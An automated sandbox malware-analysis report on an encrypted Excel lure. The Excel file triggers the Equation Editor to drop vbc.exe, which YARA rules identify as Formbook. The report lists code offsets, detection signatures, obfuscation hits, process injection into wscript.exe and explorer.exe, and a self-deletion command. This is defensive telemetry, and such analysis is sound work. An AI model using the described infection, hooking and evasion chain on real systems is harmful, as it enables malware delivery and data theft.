Source: C:\Users\Public\vbc.exe Code function: 6_2_00409E40 6_2_00409E40
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409E3B 6_2_00409E3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041DFAF 6_2_0041DFAF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9F0FF 6_2_00E9F0FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9F8DF 6_2_00E9F8DF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E98B85 6_2_00E98B85
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9C377 6_2_00E9C377
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9FCFF 6_2_00E9FCFF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9F4D3 6_2_00E9F4D3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9EC2A 6_2_00E9EC2A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085E0C6 6_2_0085E0C6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0088D005 6_2_0088D005
Source: C:\Users\Public\vbc.exe Code function: 6_2_00863040 6_2_00863040
Source: C:\Users\Public\vbc.exe Code function: 6_2_0087905A 6_2_0087905A
Source: C:\Users\Public\vbc.exe Code function: 6_2_008DD06D 6_2_008DD06D
Source: C:\Users\Public\vbc.exe Code function: 6_2_008ED13F 6_2_008ED13F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085E2E9 6_2_0085E2E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00901238 6_2_00901238
Source: C:\Users\Public\vbc.exe Code function: 6_2_009063BF 6_2_009063BF
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085F3CF 6_2_0085F3CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_008863DB 6_2_008863DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00862305 6_2_00862305
Source: C:\Users\Public\vbc.exe Code function: 6_2_00867353 6_2_00867353
Source: C:\Users\Public\vbc.exe Code function: 6_2_008AA37B 6_2_008AA37B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00895485 6_2_00895485
Source: C:\Users\Public\vbc.exe Code function: 6_2_00871489 6_2_00871489
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E443E 6_2_008E443E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0089D47D 6_2_0089D47D
Source: C:\Users\Public\vbc.exe Code function: 6_2_009035DA 6_2_009035DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E05E3 6_2_008E05E3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0087C5F0 6_2_0087C5F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086351F 6_2_0086351F
Source: C:\Users\Public\vbc.exe Code function: 6_2_008A6540 6_2_008A6540
Source: C:\Users\Public\vbc.exe Code function: 6_2_00864680 6_2_00864680
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086E6C1 6_2_0086E6C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00902622 6_2_00902622
Source: C:\Users\Public\vbc.exe Code function: 6_2_008AA634 6_2_008AA634
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E579A 6_2_008E579A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086C7BC 6_2_0086C7BC
Source: C:\Users\Public\vbc.exe Code function: 6_2_008957C3 6_2_008957C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_008DF8C4 6_2_008DF8C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_008FF8EE 6_2_008FF8EE
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086C85C 6_2_0086C85C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0088286D 6_2_0088286D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0090098E 6_2_0090098E
Source: C:\Users\Public\vbc.exe Code function: 6_2_008629B2 6_2_008629B2
Source: C:\Users\Public\vbc.exe Code function: 6_2_008769FE 6_2_008769FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E394B 6_2_008E394B
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E5955 6_2_008E5955
Source: C:\Users\Public\vbc.exe Code function: 6_2_00913A83 6_2_00913A83
Source: C:\Users\Public\vbc.exe Code function: 6_2_0090CBA4 6_2_0090CBA4
Source: C:\Users\Public\vbc.exe Code function: 6_2_008E6BCB 6_2_008E6BCB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085FBD7 6_2_0085FBD7
Source: C:\Users\Public\vbc.exe Code function: 6_2_008EDBDA 6_2_008EDBDA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00887B00 6_2_00887B00
Source: C:\Users\Public\vbc.exe Code function: 6_2_00902C9C 6_2_00902C9C
Source: C:\Users\Public\vbc.exe Code function: 6_2_008EAC5E 6_2_008EAC5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_008FFDDD 6_2_008FFDDD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00890D3B 6_2_00890D3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0086CD5B 6_2_0086CD5B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00892E2F 6_2_00892E2F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0087EE4C 6_2_0087EE4C
Source: C:\Users\Public\vbc.exe Code function: 6_2_008FCFB1 6_2_008FCFB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_008D2FDC 6_2_008D2FDC
Source: C:\Users\Public\vbc.exe Code function: 6_2_008EBF14 6_2_008EBF14
Source: C:\Users\Public\vbc.exe Code function: 6_2_00870F3F 6_2_00870F3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0088DF7C 6_2_0088DF7C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00289862 6_2_00289862
Source: C:\Users\Public\vbc.exe Code function: 6_2_00281069 6_2_00281069
Source: C:\Users\Public\vbc.exe Code function: 6_2_00281072 6_2_00281072
Source: C:\Users\Public\vbc.exe Code function: 6_2_00288132 6_2_00288132
Source: C:\Users\Public\vbc.exe Code function: 6_2_0028AA32 6_2_0028AA32
Source: C:\Users\Public\vbc.exe Code function: 6_2_0028DA6F 6_2_0028DA6F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00285B22 6_2_00285B22
Source: C:\Users\Public\vbc.exe Code function: 6_2_0028DB0E 6_2_0028DB0E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00285B1F 6_2_00285B1F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00282CEC 6_2_00282CEC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00282CF2 6_2_00282CF2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023E1238 9_2_023E1238
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0233E2E9 9_2_0233E2E9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02342305 9_2_02342305
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0238A37B 9_2_0238A37B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02347353 9_2_02347353
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023E63BF 9_2_023E63BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023663DB 9_2_023663DB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0233F3CF 9_2_0233F3CF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0236D005 9_2_0236D005
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023BD06D 9_2_023BD06D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0235905A 9_2_0235905A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02343040 9_2_02343040
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0233E0C6 9_2_0233E0C6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0238A634 9_2_0238A634
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023E2622 9_2_023E2622
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02344680 9_2_02344680
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0234E6C1 9_2_0234E6C1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0234C7BC 9_2_0234C7BC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023C579A 9_2_023C579A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023757C3 9_2_023757C3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023C443E 9_2_023C443E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0237D47D 9_2_0237D47D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02375485 9_2_02375485
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02351489 9_2_02351489
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0234351F 9_2_0234351F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02386540 9_2_02386540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0235C5F0 9_2_0235C5F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023C05E3 9_2_023C05E3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023F3A83 9_2_023F3A83
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02367B00 9_2_02367B00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023ECBA4 9_2_023ECBA4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0233FBD7 9_2_0233FBD7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023CDBDA 9_2_023CDBDA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0236286D 9_2_0236286D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0234C85C 9_2_0234C85C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023DF8EE 9_2_023DF8EE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023BF8C4 9_2_023BF8C4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023C5955 9_2_023C5955
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023C394B 9_2_023C394B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023429B2 9_2_023429B2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023E098E 9_2_023E098E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023569FE 9_2_023569FE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02372E2F 9_2_02372E2F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0235EE4C 9_2_0235EE4C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02350F3F 9_2_02350F3F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0236DF7C 9_2_0236DF7C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023DCFB1 9_2_023DCFB1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023B2FDC 9_2_023B2FDC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02370D3B 9_2_02370D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0234CD5B 9_2_0234CD5B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023DFDDD 9_2_023DFDDD
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00072D88 9_2_00072D88
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00072D90 9_2_00072D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00079E3B 9_2_00079E3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00079E40 9_2_00079E40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008DFAF 9_2_0008DFAF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00072FB0 9_2_00072FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: PI202009255687.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0085E2A8 appears 58 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00E95331 appears 62 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008CF970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008A373B appears 248 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0085DF5C appears 128 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00E94F38 appears 64 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008A3F92 appears 132 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 023AF970 appears 84 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 02383F92 appears 132 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0238373B appears 245 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0233E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0233DF5C appears 121 times
Yara signature match
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/6@4/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PI202009255687.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR1B3D.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: PI202009255687.xlsx ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: PI202009255687.xlsx Static file information: File size 2625536 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, wscript.exe
Source: Binary string: wscript.pdb source: vbc.exe, 00000006.00000002.2215307464.00000000002E0000.00000040.00000001.sdmp
Source: Binary string: wscript.pdbN source: vbc.exe, 00000006.00000002.2215307464.00000000002E0000.00000040.00000001.sdmp
Source: PI202009255687.xlsx Initial sample: OLE indicators vbamacros = False
Source: PI202009255687.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E95EF8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary, 4_2_00E95EF8
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E94F7D push ecx; ret 4_2_00E94F90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041797C push ecx; retf 6_2_0041797F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00417936 push esp; retf 6_2_00417937
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040E3E7 push ebp; iretd 6_2_0040E3E8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00417C0D push ss; ret 6_2_00417C13
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041D7C6 push cs; retf 6_2_0041D7C7
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041678C push 00000050h; retf 6_2_0041678F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E94F7D push ecx; ret 6_2_00E94F90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085DFA1 push ecx; ret 6_2_0085DFB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0028E3E6 pushad ; ret 6_2_0028E3E7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0233DFA1 push ecx; ret 9_2_0233DFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0007E3E7 push ebp; iretd 9_2_0007E3E8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008678C push 00000050h; retf 9_2_0008678F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008D7C6 push cs; retf 9_2_0008D7C7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00087936 push esp; retf 9_2_00087937
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008797C push ecx; retf 9_2_0008797F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00087C0D push ss; ret 9_2_00087C13
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008CEB5 push eax; ret 9_2_0008CF08
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008CF0B push eax; ret 9_2_0008CF72
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008CF02 push eax; ret 9_2_0008CF08
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008CF6C push eax; ret 9_2_0008CF72

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: PI202009255687.xlsx Stream path 'EncryptedPackage' entropy: 7.99992874048 (max. 8.0)

Malware Analysis System Evasion:

barindex
